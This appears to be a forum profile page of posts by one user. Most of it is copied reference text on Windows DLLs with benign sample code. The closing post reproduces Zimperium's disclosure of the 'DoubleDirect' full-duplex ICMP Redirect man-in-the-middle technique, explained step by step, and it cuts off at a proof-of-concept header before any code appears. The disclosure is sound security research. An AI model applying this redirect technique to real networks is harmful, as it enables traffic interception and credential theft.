Everything posted by monstr
Dynamic-link library, or DLL, is Microsoft's implementation of the shared library concept in the Microsoft Windows and OS/2 operating systems. These libraries usually have the file extension DLL, OCX (for libraries containing ActiveX controls), or DRV (for legacy system drivers). The file formats for DLLs are the same as for Windows EXE files – that is, Portable Executable (PE) for 32-bit and 64-bit Windows, and New Executable (NE) for 16-bit Windows. As with EXEs, DLLs can contain code, data, and resources, in any combination. Data files with the same file format as a DLL, but with different file extensions and possibly containing only resource sections, can be called resource DLLs. Examples of such DLLs include icon libraries, sometimes having the extension ICL, and font files, having the extensions FON and FOT. Background The first versions of Microsoft Windows ran programs together in a single address space. Every program was meant to co-operate by yielding the CPU to other programs so that the graphical user interface (GUI) could multitask and be maximally responsive. All operating system level operations were provided by the underlying operating system: MS-DOS. All higher level services were provided by Windows Libraries "Dynamic Link Library." The Drawing API, GDI, was implemented in a DLL called GDI.EXE, the user interface in USER.EXE. These extra layers on top of DOS had to be shared across all running Windows programs, not just to enable Windows to work in a machine with less than a megabyte of RAM, but to enable the programs to co-operate among each other. The Graphics Device Interface code in GDI needed to translate drawing commands to operations on specific devices. On the display, it had to manipulate pixels in the frame buffer. When drawing to a printer, the API calls had to be transformed into requests to a printer. 
Although it could have been possible to provide hard-coded support for a limited set of devices (like the Color Graphics Adapter display, the HP LaserJet Printer Command Language), Microsoft chose a different approach. GDI would work by loading different pieces of code, called 'device drivers', to work with different output devices. The same architectural concept that allowed GDI to load different device drivers is that which allowed the Windows shell to load different Windows programs, and for these programs to invoke API calls from the shared USER and GDI libraries. That concept was "dynamic linking." In a conventional non-shared "static" library, sections of code are simply added to the calling program when its executable is built at the "linking" phase; if two programs call the same routine, the routine is included in both the programs during the linking stage of the two. With dynamic linking, shared code is placed into a single, separate file. The programs that call this file are connected to it at run time, with the operating system (or, in the case of early versions of Windows, the OS-extension), performing the binding. For those early versions of Windows (1.0 to 3.11), the DLLs were the foundation for the entire GUI. Display drivers were merely DLLs with a .DRV extension that provided custom implementations of the same drawing API through a unified device driver interface (DDI). The Drawing (GDI) and GUI (USER) APIs were merely the function calls exported by the GDI and USER, system DLLs with .EXE extension. This notion of building up the operating system from a collection of dynamically loaded libraries is a core concept of Windows that persists even today. DLLs provide the standard benefits of shared libraries, such as modularity. Modularity allows changes to be made to code and data in a single self-contained DLL shared by several applications without any change to the applications themselves. 
Another benefit of the modularity is the use of generic interfaces for plug-ins. A single interface may be developed which allows old as well as new modules to be integrated seamlessly at run-time into pre-existing applications, without any modification to the application itself. This concept of dynamic extensibility is taken to the extreme with the Component Object Model, the underpinnings of ActiveX. In Windows 1.x, 2.x and 3.x, all Windows applications shared the same address space as well as the same memory. A DLL was only loaded once into this address space; from then on, all programs using the library accessed it. The library's data was shared across all the programs. This could be used as an indirect form of inter-process communication, or it could accidentally corrupt the different programs. With the introduction of 32-bit libraries in Windows 95 every process runs in its own address space. While the DLL code may be shared, the data is private except where shared data is explicitly requested by the library. That said, large swathes of Windows 95, Windows 98 and Windows Me were built from 16-bit libraries, which limited the performance of the Pentium Pro microprocessor when launched, and ultimately limited the stability and scalability of the DOS-based versions of Windows. Although DLLs are the core of the Windows architecture, they have several drawbacks, collectively called "DLL hell". Microsoft currently promotes .NET Framework as one solution to the problems of DLL hell, although they now promote virtualization-based solutions such as Microsoft Virtual PC and Microsoft Application Virtualization, because they offer superior isolation between applications. An alternative mitigating solution to DLL hell has been implementing side-by-side assembly. Features of dll Since DLLs are essentially the same as EXEs, the choice of which to produce as part of the linking process is for clarity, since it is possible to export functions and data from either. 
It is not possible to execute a DLL directly, since the operating system needs an EXE to load it through an entry point; hence the existence of utilities like RUNDLL.EXE or RUNDLL32.EXE, which provide the entry point and a minimal framework for DLLs that contain enough functionality to execute without much support.

DLLs provide a mechanism for shared code and data, allowing a developer of shared code or data to upgrade functionality without requiring applications to be re-linked or re-compiled. From the application development point of view, Windows and OS/2 can be thought of as a collection of DLLs that are upgraded, allowing applications for one version of the OS to work in a later one, provided that the OS vendor has ensured that the interfaces and functionality are compatible.

DLLs execute in the memory space of the calling process and with the same access permissions, which means there is little overhead in their use, but also that there is no protection for the calling EXE if the DLL has any sort of bug.

Memory Management

In the Windows API, DLL files are organized into sections. Each section has its own set of attributes, such as being writable or read-only, executable (for code) or non-executable (for data), and so on.

The code in a DLL is usually shared among all the processes that use the DLL; that is, the code sections occupy a single place in physical memory and do not take up space in the page file. If the physical memory occupied by a code section is to be reclaimed, its contents are discarded, and later reloaded directly from the DLL file as necessary.

In contrast to code sections, the data sections of a DLL are usually private; that is, each process using the DLL has its own copy of all the DLL's data. Optionally, data sections can be made shared, allowing inter-process communication via this shared memory area.
However, because user restrictions do not apply to the use of shared DLL memory, this creates a security hole; namely, one process can corrupt the shared data, which will likely cause all other sharing processes to behave undesirably. For example, a process running under a guest account can in this way corrupt another process running under a privileged account. This is an important reason to avoid the use of shared sections in DLLs. If a DLL is compressed by certain executable packers (e.g. UPX), all of its code sections are marked as read and write, and will be unshared. Read-and-write code sections, much like private data sections, are private to each process. Thus DLLs with shared data sections should not be compressed if they are intended to be used simultaneously by multiple programs, since each program instance would have to carry its own copy of the DLL, resulting in increased memory consumption. Import Libraries Like static libraries, import libraries for DLLs are noted by the .lib file extension. For example, kernel32.dll, the primary dynamic library for Windows' base functions such as file creation and memory management, is linked via kernel32.lib. Linking to dynamic libraries is usually handled by linking to an import library when building or linking to create an executable file. The created executable then contains an import address table (IAT) by which all DLL function calls are referenced (each referenced DLL function contains its own entry in the IAT). At run-time, the IAT is filled with appropriate addresses that point directly to a function in the separately loaded DLL. Symbol resolution and binding Each function exported by a DLL is identified by a numeric ordinal and optionally a name. Likewise, functions can be imported from a DLL either by ordinal or by name. The ordinal represents the position of the function's address pointer in the DLL Export Address table. It is common for internal functions to be exported by ordinal only. 
For most Windows API functions only the names are preserved across different Windows releases; the ordinals are subject to change. Thus, one cannot reliably import Windows API functions by their ordinals. Importing functions by ordinal provides only slightly better performance than importing them by name: export tables of DLLs are ordered by name, so a binary search can be used to find a function. The index of the found name is then used to look up the ordinal in the Export Ordinal table. In 16-bit Windows, the name table was not sorted, so the name lookup overhead was much more noticeable. It is also possible to bind an executable to a specific version of a DLL, that is, to resolve the addresses of imported functions at compile-time. For bound imports, the linker saves the timestamp and checksum of the DLL to which the import is bound. At run-time Windows checks to see if the same version of library is being used, and if so, Windows bypasses processing the imports. Otherwise, if the library is different from the one which was bound to, Windows processes the imports in a normal way. Bound executables load somewhat faster if they are run in the same environment that they were compiled for, and exactly the same time if they are run in a different environment, so there's no drawback for binding the imports. For example, all the standard Windows applications are bound to the system DLLs of their respective Windows release. A good opportunity to bind an application's imports to its target environment is during the application's installation. This keeps the libraries 'bound' until the next OS update. It does, however, change the checksum of the executable, so it is not something that can be done with signed programs, or programs that are managed by a configuration management tool that uses checksums (such as MD5 checksums) to manage file versions. 
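The by-name lookup described in this section (binary search over the sorted name table, then the ordinal table, then the export address table) can be sketched in portable C. This is only an illustration under stated assumptions: `export_table`, `lookup_by_name`, `lookup_by_ordinal` and the `demo_*` data are hypothetical names, and plain arrays stand in for the relative addresses and ordinal base that the real PE export directory uses.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical, simplified model of a DLL export directory. */
typedef int (*export_fn)(int);

typedef struct {
    const char *const *names;        /* export names, sorted in strcmp order   */
    const unsigned short *ordinals;  /* ordinals[i]: index into functions[]
                                        for names[i]                           */
    size_t name_count;
    const export_fn *functions;      /* export address table                   */
    size_t function_count;
} export_table;

/* Import by ordinal: a direct index into the address table. */
export_fn lookup_by_ordinal(const export_table *t, size_t index)
{
    assert(t != NULL);
    return index < t->function_count ? t->functions[index] : NULL;
}

/* Import by name: binary search the name table, then map the matching
   name index to an ordinal, then to an address. */
export_fn lookup_by_name(const export_table *t, const char *name)
{
    assert(t != NULL && name != NULL);
    size_t lo = 0, hi = t->name_count;
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        int cmp = strcmp(name, t->names[mid]);
        if (cmp == 0)
            return lookup_by_ordinal(t, t->ordinals[mid]);
        if (cmp < 0)
            hi = mid;
        else
            lo = mid + 1;
    }
    return NULL;  /* no export with that name */
}

/* Demo data: three functions, of which negate is exported by ordinal only. */
static int add_one(int x) { return x + 1; }
static int twice(int x)   { return 2 * x; }
static int negate(int x)  { return -x; }

static const export_fn demo_functions[]     = { twice, negate, add_one };
static const char *const demo_names[]       = { "AddOne", "Twice" };
static const unsigned short demo_ordinals[] = { 2, 0 };
static const export_table demo_table = {
    demo_names, demo_ordinals, 2, demo_functions, 3
};
```

With this data, `lookup_by_name(&demo_table, "Twice")` goes through two table hops, while `lookup_by_ordinal(&demo_table, 1)` reaches `negate` with a single index, which is the small performance difference the text refers to.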
As more recent Windows versions have moved away from having fixed addresses for every loaded library (for security reasons), the opportunity and value of binding an executable is decreasing. Explicit run-time linking DLL files may be explicitly loaded at run-time, a process referred to simply as run-time dynamic linking by Microsoft, by using the LoadLibrary (or LoadLibraryEx) API function. The GetProcAddress API function is used to look up exported symbols by name, and FreeLibrary – to unload the DLL. These functions are analogous to dlopen, dlsym, and dlclose in the POSIX standard API. /* LSPaper draw using OLE2 function if available on client */ HINSTANCE ole; ole = LoadLibrary("OLE2.DLL"); if (ole != NULL) { FARPROC oledraw = GetProcAddress(ole, "OleDraw"); if (oledraw != NULL) (*oledraw)(pUnknown, dwAspect, hdcDraw, lprcBounds); FreeLibrary(ole); } The procedure for explicit run-time linking is the same in any language that supports pointers to functions, since it depends on the Windows API rather than language constructs. Delayed loading Normally, an application that was linked against a DLL’s import library will fail to start if the DLL cannot be found, because Windows will not run the application unless it can find all of the DLLs that the application may need. However an application may be linked against an import library to allow delayed loading of the dynamic library.[3] In this case the operating system will not try to find or load the DLL when the application starts; instead, a stub is included in the application by the linker which will try to find and load the DLL through LoadLibrary and GetProcAddress when one of its functions is called. If the DLL cannot be found or loaded, or the called function does not exist, the application will generate an exception, which may be caught and handled appropriately. If the application does not handle the exception, it will be caught by the operating system, which will terminate the program with an error message. 
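The stub mechanism behind delayed loading can be illustrated with a small portable C sketch. It is not the linker-generated helper: `resolve_symbol` is a hypothetical stand-in for the LoadLibrary and GetProcAddress calls, `real_add_numbers` stands in for the DLL's export, and a failed lookup trips an assertion where the real helper would raise an exception.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef double (*add_fn)(double, double);

/* Stand-in for the function that would live inside the DLL. */
static double real_add_numbers(double a, double b) { return a + b; }

static int resolve_calls = 0;  /* how many times the simulated loader ran */

/* Hypothetical stand-in for LoadLibrary followed by GetProcAddress. */
static add_fn resolve_symbol(const char *dll, const char *symbol)
{
    resolve_calls++;
    if (strcmp(dll, "Example.dll") == 0 && strcmp(symbol, "AddNumbers") == 0)
        return real_add_numbers;
    return NULL;
}

static double add_numbers_stub(double a, double b);

/* Import slot: starts out pointing at the stub, not at the real function. */
static add_fn add_numbers_slot = add_numbers_stub;

/* First call lands here: resolve the symbol, patch the slot, forward. */
static double add_numbers_stub(double a, double b)
{
    add_fn target = resolve_symbol("Example.dll", "AddNumbers");
    assert(target != NULL);     /* the real helper raises an exception here */
    add_numbers_slot = target;  /* later calls bypass the stub entirely     */
    return target(a, b);
}

/* What the application calls; it never sees the stub directly. */
double AddNumbers(double a, double b) { return add_numbers_slot(a, b); }

int loader_invocations(void) { return resolve_calls; }
```

Nothing is resolved at start-up in this sketch; the first call to `AddNumbers` pays for the lookup, and every later call goes straight through the patched slot.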
The delay-loading mechanism also provides notification hooks, allowing the application to perform additional processing or error handling when the DLL is loaded and/or any DLL function is called. Compiler and language considerations Delphi In the heading of a source file, the keyword library is used instead of program. At the end of the file, the functions to be exported are listed in exports clause. Delphi does not need LIB files to import functions from DLLs; to link to a DLL, the external keyword is used in the function declaration to signal the DLL name, followed by name to name the symbol (if different) or index to identify the index. Microsoft Visual Basic In Visual Basic (VB), only run-time linking is supported; but in addition to using LoadLibrary and GetProcAddress API functions, declarations of imported functions are allowed. When importing DLL functions through declarations, VB will generate a run-time error if the DLL file cannot be found. The developer can catch the error and handle it appropriately. When creating DLLs in VB, the IDE will only allow you to create ActiveX DLLs, however methods have been created to allow the user to explicitly tell the linker to include a .DEF file which defines the ordinal position and name of each exported function. This allows the user to create a standard Windows DLL using Visual Basic (Version 6 or lower) which can be referenced through a "Declare" statement. C and C++ Microsoft Visual C++ (MSVC) provides several extensions to standard C++ which allow functions to be specified as imported or exported directly in the C++ code; these have been adopted by other Windows C and C++ compilers, including Windows versions of GCC. These extensions use the attribute __declspec before a function declaration. Note that when C functions are accessed from C++, they must also be declared as extern "C" in C++ code, to inform the compiler that the C linkage should be used. 
Besides specifying imported or exported functions using __declspec attributes, they may be listed in the IMPORTS or EXPORTS section of the DEF file used by the project. The DEF file is processed by the linker, rather than the compiler, and thus it is not specific to C++.

DLL compilation will produce both DLL and LIB files. The LIB file is used to link against a DLL at build time; it is not necessary for run-time linking.

Unless your DLL is a Component Object Model (COM) server, the DLL file must be placed in one of the directories listed in the PATH environment variable, in the default system directory, or in the same directory as the program using it. COM server DLLs are registered using regsvr32.exe, which places the DLL's location and its globally unique ID (GUID) in the registry. Programs can then use the DLL by looking up its GUID in the registry to find its location.

Creating DLL exports

The following examples show language-specific bindings for exporting symbols from DLLs.

Delphi

    library Example;

    // function that adds two numbers
    function AddNumbers(a, b : Double): Double; cdecl;
    begin
      Result := a + b;
    end;

    // export this function
    exports AddNumbers;

    // DLL initialization code: no special handling needed
    begin
    end.

C

    #include <windows.h>

    // DLL entry function (called on load, unload, ...)
    BOOL APIENTRY DllMain(HANDLE hModule, DWORD dwReason, LPVOID lpReserved)
    {
        return TRUE;
    }

    // Exported function - adds two numbers.
    // extern "C" is only valid (and only needed) when compiled as C++.
    #ifdef __cplusplus
    extern "C"
    #endif
    __declspec(dllexport) double AddNumbers(double a, double b)
    {
        return a + b;
    }

Using DLL imports

The following examples show how to use language-specific bindings to import symbols for linking against a DLL at compile-time.

Delphi

    {$APPTYPE CONSOLE}
    program Example;

    // import function that adds two numbers
    function AddNumbers(a, b : Double): Double; cdecl; external 'Example.dll';

    // main program
    var
      R: Double;
    begin
      R := AddNumbers(1, 2);
      Writeln('The result was: ', R);
    end.
C

Make sure you add the Example.lib file to the project (Add Existing Item option for Project) before linking; this assumes Example.dll has already been built. Example.lib is the import library generated automatically when the DLL is built. If you skip this step, the link fails because the linker does not know where to find the definition of AddNumbers. You also need to copy Example.dll to the folder where the .exe file built from the following code is generated.

    #include <windows.h>
    #include <stdio.h>

    // Import function that adds two numbers.
    // extern "C" is only valid (and only needed) when compiled as C++.
    #ifdef __cplusplus
    extern "C"
    #endif
    __declspec(dllimport) double AddNumbers(double a, double b);

    int main(int argc, char *argv[])
    {
        double result = AddNumbers(1, 2);
        printf("The result was: %f\n", result);
        return 0;
    }

Using explicit run-time linking

The following examples show how to use the run-time loading and linking facilities using language-specific Windows API bindings.

Microsoft Visual Basic

    Option Explicit
    Declare Function AddNumbers Lib "Example.dll" _
        (ByVal a As Double, ByVal b As Double) As Double

    Sub Main()
        Dim Result As Double
        Result = AddNumbers(1, 2)
        Debug.Print "The result was: " & Result
    End Sub

Delphi

    program Example;
    {$APPTYPE CONSOLE}
    uses Windows;

    var
      // parameter types must match the DLL export, which takes Doubles
      AddNumbers: function (a, b: Double): Double; cdecl;
      LibHandle: HMODULE;
    begin
      LibHandle := LoadLibrary('example.dll');
      if LibHandle <> 0 then
      begin
        AddNumbers := GetProcAddress(LibHandle, 'AddNumbers');
        if Assigned(AddNumbers) then
          Writeln('1 + 2 = ', AddNumbers(1, 2));
        FreeLibrary(LibHandle);
      end;
      Readln;
    end.
C

    #include <windows.h>
    #include <stdio.h>

    // DLL function signature
    typedef double (*importFunction)(double, double);

    int main(int argc, char **argv)
    {
        importFunction addNumbers;
        double result;
        HINSTANCE hinstLib;

        // Load DLL file
        hinstLib = LoadLibrary(TEXT("Example.dll"));
        if (hinstLib == NULL) {
            printf("ERROR: unable to load DLL\n");
            return 1;
        }

        // Get function pointer
        addNumbers = (importFunction) GetProcAddress(hinstLib, "AddNumbers");
        if (addNumbers == NULL) {
            printf("ERROR: unable to find DLL function\n");
            FreeLibrary(hinstLib);
            return 1;
        }

        // Call function.
        result = addNumbers(1, 2);

        // Unload DLL file
        FreeLibrary(hinstLib);

        // Display result
        printf("The result was: %f\n", result);
        return 0;
    }

Python

    import ctypes

    my_dll = ctypes.cdll.LoadLibrary("Example.dll")

    # The following "restype" attribute is needed to make
    # Python understand what type is returned by the function.
    my_dll.AddNumbers.restype = ctypes.c_double

    p = my_dll.AddNumbers(ctypes.c_double(1.0), ctypes.c_double(2.0))
    print("The result was:", p)

Source

DLL Development

This section describes the issues and the requirements that you should consider when you develop your own DLLs.

Types of DLLs

When you load a DLL in an application, two methods of linking let you call the exported DLL functions. The two methods of linking are load-time dynamic linking and run-time dynamic linking.

Load-time dynamic linking

In load-time dynamic linking, an application makes explicit calls to exported DLL functions as if they were local functions. To use load-time dynamic linking, provide a header (.h) file and an import library (.lib) file when you compile and link the application. When you do this, the linker will provide the system with the information that is required to load the DLL and resolve the exported DLL function locations at load time.

Run-time dynamic linking

In run-time dynamic linking, an application calls either the LoadLibrary function or the LoadLibraryEx function to load the DLL at run time.
After the DLL is successfully loaded, you use the GetProcAddress function to obtain the address of the exported DLL function that you want to call. When you use run-time dynamic linking, you do not need an import library file.

The following list describes the application criteria for when to use load-time dynamic linking and when to use run-time dynamic linking:

Startup performance: If the initial startup performance of the application is important, you should use run-time dynamic linking.
Ease of use: In load-time dynamic linking, the exported DLL functions are like local functions. This makes it easy for you to call these functions.
Application logic: In run-time dynamic linking, an application can branch to load different modules as required. This is important when you develop multiple-language versions.

The DLL entry point

When you create a DLL, you can optionally specify an entry point function. The entry point function is called when processes or threads attach themselves to the DLL or detach themselves from the DLL. You can use the entry point function to initialize data structures or to destroy data structures as required by the DLL. Additionally, if the application is multithreaded, you can use thread local storage (TLS) to allocate memory that is private to each thread in the entry point function. The following code is an example of the DLL entry point function.

    BOOL APIENTRY DllMain(
        HANDLE hModule,            // Handle to DLL module
        DWORD ul_reason_for_call,  // Reason for calling function
        LPVOID lpReserved )        // Reserved
    {
        switch ( ul_reason_for_call )
        {
            case DLL_PROCESS_ATTACH:
                // A process is loading the DLL.
                break;
            case DLL_THREAD_ATTACH:
                // A process is creating a new thread.
                break;
            case DLL_THREAD_DETACH:
                // A thread exits normally.
                break;
            case DLL_PROCESS_DETACH:
                // A process unloads the DLL.
                break;
        }
        return TRUE;
    }

When the entry point function returns a FALSE value, the application will not start if you are using load-time dynamic linking.
If you are using run-time dynamic linking, only the individual DLL will not load.

The entry point function should only perform simple initialization tasks and should not call any other DLL loading or termination functions. For example, in the entry point function, you should not directly or indirectly call the LoadLibrary function or the LoadLibraryEx function. Additionally, you should not call the FreeLibrary function when the process is terminating.

Note: In multithreaded applications, make sure that access to the DLL global data is synchronized (thread safe) to avoid possible data corruption. To do this, use TLS to provide unique data for each thread.

Exporting DLL functions

To export DLL functions, you can either add a function keyword to the exported DLL functions or create a module definition (.def) file that lists the exported DLL functions.

To use a function keyword, you must declare each function that you want to export with the following keyword:

    __declspec(dllexport)

To use exported DLL functions in the application, you must declare each function that you want to import with the following keyword:

    __declspec(dllimport)

Typically, you would use one header file that has a define statement and an ifdef statement to separate the export statement and the import statement.

You can also use a module definition file to declare exported DLL functions. When you use a module definition file, you do not have to add the function keyword to the exported DLL functions. In the module definition file, you declare the LIBRARY statement and the EXPORTS statement for the DLL. The following code is an example of a definition file. Comments in a .def file start with a semicolon.

    ; SampleDLL.def
    ;
    LIBRARY "sampleDLL"

    EXPORTS
        HelloWorld

Sample DLL and application

In Microsoft Visual C++ 6.0, you can create a DLL by selecting either the Win32 Dynamic-Link Library project type or the MFC AppWizard (dll) project type.
The following code is an example of a DLL that was created in Visual C++ by using the Win32 Dynamic-Link Library project type.

    // SampleDLL.cpp
    //
    #include "stdafx.h"
    #define EXPORTING_DLL
    #include "sampleDLL.h"

    BOOL APIENTRY DllMain( HANDLE hModule,
                           DWORD ul_reason_for_call,
                           LPVOID lpReserved )
    {
        return TRUE;
    }

    void HelloWorld()
    {
        MessageBox( NULL, TEXT("Hello World"), TEXT("In a DLL"), MB_OK);
    }

    // File: SampleDLL.h
    //
    #ifndef INDLL_H
    #define INDLL_H

    #ifdef EXPORTING_DLL
    extern __declspec(dllexport) void HelloWorld();
    #else
    extern __declspec(dllimport) void HelloWorld();
    #endif

    #endif

The following code is an example of a Win32 Application project that calls the exported DLL function in the SampleDLL DLL.

    // SampleApp.cpp
    //
    #include "stdafx.h"
    #include "sampleDLL.h"

    int APIENTRY WinMain(HINSTANCE hInstance,
                         HINSTANCE hPrevInstance,
                         LPSTR lpCmdLine,
                         int nCmdShow)
    {
        HelloWorld();
        return 0;
    }

Note: In load-time dynamic linking, you must link the SampleDLL.lib import library that is created when you build the SampleDLL project.

In run-time dynamic linking, you use code that is similar to the following code to call the SampleDLL.dll exported DLL function.

    ...
    typedef void (*DLLPROC)(void);   // matches void HelloWorld()
    ...
    HINSTANCE hinstDLL;
    DLLPROC HelloWorld;
    BOOL fFreeDLL;

    hinstDLL = LoadLibrary(TEXT("sampleDLL.dll"));
    if (hinstDLL != NULL)
    {
        // The lookup needs the undecorated name, so export HelloWorld
        // through a .def file or declare it extern "C".
        HelloWorld = (DLLPROC) GetProcAddress(hinstDLL, "HelloWorld");
        if (HelloWorld != NULL)
            HelloWorld();
        fFreeDLL = FreeLibrary(hinstDLL);
    }
    ...

When the SampleDLL application loads the DLL, the Windows operating system searches for the SampleDLL DLL in the following locations in this order:

1. The application folder
2. The current folder
3. The Windows system folder
   Note: The GetSystemDirectory function returns the path of the Windows system folder.
4. The Windows folder
   Note: The GetWindowsDirectory function returns the path of the Windows folder.
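The search order listed above amounts to a "first match wins" walk over an ordered list of folders. The following portable C sketch shows that idea only; it is not the Windows loader, which applies further rules that this text does not cover. The names `find_dll`, `demo_dirs`, `demo_exists` and `demo_find`, and the folder paths, are all hypothetical.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Callback that reports whether a file exists; injected so that the
   sketch does not depend on any particular file system. */
typedef int (*exists_fn)(const char *path);

/* Try each folder in order and stop at the first one that contains the
   DLL. Returns the index of that folder and leaves the full path in out,
   or returns -1 (with out emptied) if no folder contains it. */
int find_dll(const char *const dirs[], size_t dir_count, const char *dll_name,
             exists_fn exists, char *out, size_t out_size)
{
    for (size_t i = 0; i < dir_count; i++) {
        int n = snprintf(out, out_size, "%s\\%s", dirs[i], dll_name);
        if (n < 0 || (size_t)n >= out_size)
            continue;               /* candidate path did not fit */
        if (exists(out))
            return (int)i;
    }
    if (out_size > 0)
        out[0] = '\0';
    return -1;
}

/* Demo data: hypothetical folders in the order given in the text. */
static const char *const demo_dirs[] = {
    "C:\\App",                /* the application folder    */
    "C:\\Work",               /* the current folder        */
    "C:\\Windows\\System32",  /* the Windows system folder */
    "C:\\Windows"             /* the Windows folder        */
};

/* Pretend that only the system folder holds a copy of the DLL. */
static int demo_exists(const char *path)
{
    return strcmp(path, "C:\\Windows\\System32\\sampleDLL.dll") == 0;
}

/* Convenience wrapper: returns the resolved path, or NULL if not found. */
const char *demo_find(const char *dll_name)
{
    static char path[260];
    int hit = find_dll(demo_dirs, 4, dll_name, demo_exists, path, sizeof path);
    return hit >= 0 ? path : NULL;
}
```

Because the walk stops at the first hit, a copy of the DLL placed in the application folder would shadow the one in the system folder.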
The .NET Framework assembly With the introduction of Microsoft .NET and the .NET Framework, most of the problems that are associated with DLLs have been eliminated by using assemblies. An assembly is a logical unit of functionality that runs under the control of the .NET common language runtime (CLR). An assembly physically exists as a .dll file or as an .exe file. However, internally an assembly is very different from a Microsoft Win32 DLL. An assembly file contains an assembly manifest, type metadata, Microsoft intermediate language (MSIL) code, and other resources. The assembly manifest contains the assembly metadata that provides all the information that is required for an assembly to be self-describing. The following information is included in the assembly manifest: Assembly name Version information Culture information Strong name information The assembly list of files Type reference information Referenced and dependent assembly information The MSIL code that is contained in the assembly cannot be directly executed. Instead, MSIL code execution is managed through the CLR. By default, when you create an assembly, the assembly is private to the application. To create a shared assembly requires that you assign a strong name to the assembly and then publish the assembly in the global assembly cache. The following list describes some of the features of assemblies compared to the features of Win32 DLLs: Self-describing When you create an assembly, all the information that is required for the CLR to run the assembly is contained in the assembly manifest. The assembly manifest contains a list of the dependent assemblies. Therefore, the CLR can maintain a consistent set of assemblies that are used in the application. In Win32 DLLs, you cannot maintain consistency between a set of DLLs that are used in an application when you use shared DLLs. Versioning In an assembly manifest, version information is recorded and enforced by the CLR. 
Additionally, version policies let you enforce version-specific usage. In Win32 DLLs, versioning cannot be enforced by the operating system. Instead, you must make sure that DLLs are backward compatible. Side-by-side deployment Assemblies support side-by-side deployment. One application can use one version of an assembly, and another application can use a different version of an assembly. Starting in Windows 2000, side-by-side deployment is supported by locating DLLs in the application folder. Additionally, Windows File Protection prevents system DLLs from being overwritten or replaced by an unauthorized agent. Self-containment and isolation An application that is developed by using an assembly can be self-contained and isolated from other applications that are running on the computer. This feature helps you create zero-impact installations. Execution An assembly is run under the security permissions that are supplied in the assembly manifest and that are controlled by the CLR. Language independent An assembly can be developed by using any one of the supported .NET languages. For example, you can develop an assembly in Microsoft Visual C#, and then use the assembly in a Microsoft Visual Basic .NET project. Source
Over the last year, Zimperium Mobile Security Labs has investigated a new type of attack technique being exploited in the wild. Aptly named “DoubleDirect,” this attack technique is a type of “Man-in-the-Middle” attack (MITM) enabling an attacker to redirect a victim’s traffic to the attacker’s device. Once the traffic is redirected, the attacker can steal credentials and deliver malicious payloads to the victim’s mobile device, which can not only quickly infect the device but also spread throughout a corporate network.

We have identified that the traffic of the following services was redirected during the attacks on victims’ devices: Google, Facebook, Twitter, Hotmail, Live.com, Naver.com (Korean) and others. Because the attack operates on the IP addresses that the user accesses, it does not necessarily mean that the attacker had visibility into the encrypted traffic that some of the above services enforce.

We identified attacks across 31 countries, outlined below: Serbia, Australia, Iraq, Kazakhstan, Poland, Indonesia, Israel, Latvia, Finland, Mexico, Egypt, United Kingdom, Austria, Colombia, Greece, Brazil, Canada, France, Algeria, Russian Federation, Switzerland, Italy, Germany, Spain, Saudi Arabia, Netherlands, India, Malta, Bahrain, United States, China.

The growth of mobile devices has led to a significant rise in network attacks on wireless networks. An “ICMP Redirect” attack is one example of a known MITM network attack, often used as an alternative to an ARP poisoning attack technique. Current implementations of ICMP Redirect in publicly available tools like ettercap are half-duplex MITM, meaning that one side (the victim) is poisoned using an ICMP Redirect and the router is poisoned using old-school ARP spoofing. With such an implementation, networks that are immune to ARP spoofing will be able to stop the attack.

From Ettercap Manual Reference Pages[1]: “It sends a spoofed icmp redirect message to the hosts in the lan pretending to be a better route for internet.
All connections to internet will be redirected to the attacker which, in turn, will forward them to the real gateway. The resulting attack is a HALF-DUPLEX mitm. Only the client is redirected, since the gateway will not accept redirect messages for a directly connected network.”

So how does DoubleDirect work?

DoubleDirect uses ICMP Redirect packets (type 5) to modify the routing tables of a host. Routers use these packets legitimately to notify the hosts on the network that a better route is available for a particular destination[2]. However, an attacker can also use ICMP Redirect packets to alter the routing tables on the victim host, causing the traffic for a particular IP to flow via an arbitrary network path. As a result, the attacker can launch a MITM attack, redirecting the victim’s traffic to the attacker’s device. Once the traffic is redirected, the attacker can compromise the mobile device by chaining the attack with an additional client-side vulnerability (e.g., a browser vulnerability), which in turn gives the attacker access to the corporate network.

With the detection of DoubleDirect in the wild, we understood that the attackers are using a previously unknown implementation to achieve full-duplex MITM using ICMP Redirect. Traditional ICMP Redirect attacks have limitations and are known to be half-duplex MITM. Zimperium Mobile Security Labs researched the threats and determined that the attackers are able to predict the IPs being accessed by the victim. We have investigated the attacks and also created a POC tool to prove that it is possible to perform full-duplex ICMP Redirect attacks.

ICMP Redirect attacks are not easy to emulate because the attacker must know beforehand which IP address the victim has accessed. (There isn’t a systematic way to forward all the traffic from the victim through the attacker.) How did the attackers know which IP addresses the victim had already accessed?
To answer that question, we should look at the first thing a victim’s device does when a URL is entered into the browser. For example, when we type www.zimperium.com into any browser, the application sends a DNS request to find the IP address of the www.zimperium.com host. As a first step, we can use ICMP Redirect packets to forward all the DNS traffic from the victim’s device to our machine. Most of the time we can predict which DNS server the victim is using. If it is on the same LAN, the DNS server is likely to be the same as ours, obtained through DHCP. Some mobile devices use specific DNS servers by default (8.8.8.8 and/or 8.8.4.4). Once we have all the DNS traffic redirected and forwarded transparently through our device, we can send an ICMP Redirect packet for every IP address we find in the sniffed DNS replies. The attackers are sniffing not only the victim’s DNS traffic, but also the traffic to every address that is resolved through it.

Finally, we present a simple and effective tool to audit for DoubleDirect:

/* * DoubleDirect - Full-Duplex ICMP Redirect Auditing Tool - doubledirect_poc.cpp * Zimperium assumes no responsibility for any damage caused by using this software. * Permitted for educational or auditing purposes only. 
